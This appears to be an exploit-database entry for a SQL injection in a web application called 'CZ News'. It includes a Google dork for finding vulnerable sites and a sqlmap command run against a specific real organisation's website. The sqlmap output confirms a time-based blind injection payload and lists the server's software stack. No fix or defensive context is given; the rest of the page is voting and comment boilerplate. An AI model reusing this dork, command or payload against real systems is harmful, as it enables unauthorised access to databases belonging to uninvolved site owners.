CZ News SQLi Exploit

2017.05.27

HocaXD (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:index.php?id= intext:News&Do-cuments

#################################################################################
# Exploit Title: CZ News SQLi Exploit
# Google Dork: inurl:index.php?id= intext:News&Do-cuments
# Date: 27.05.2017
# Exploit Author: HocaXD
# Version: V.1
# Category: Web Apps
# Tested on: Parrot Security OS / Google Chrome
#################################################################################
# CVE :
[+] python sqlmap.py -u "http://www.icdcprague.org/index.php?id=10'" --dbs --random-agent
sqlmap identified the following injection point(s) with a total of 2330 HTTP(s) requests:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10' AND SLEEP(5)-- EgIH
---
[14:11:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
#################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CZ News SQLi Exploit

Dork: inurl:index.php?id= intext:News&Do-cuments

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.